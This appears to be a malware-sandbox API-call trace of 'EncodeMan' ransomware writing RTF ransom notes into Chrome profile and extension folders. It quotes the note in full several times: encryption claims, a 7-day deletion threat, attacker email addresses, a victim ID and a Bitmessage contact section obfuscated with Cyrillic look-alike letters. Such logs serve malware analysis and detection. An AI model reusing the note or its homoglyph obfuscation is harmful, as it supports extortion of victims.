(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\#readme_eman#.rtf")) returned 0x20 [0278.174] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\#readme_eman#.rtf")) returned 0x20 [0278.174] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\#readme_eman#.rtf")) returned 0xffffffff [0278.174] GetLastError () returned 0x2 [0278.174] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 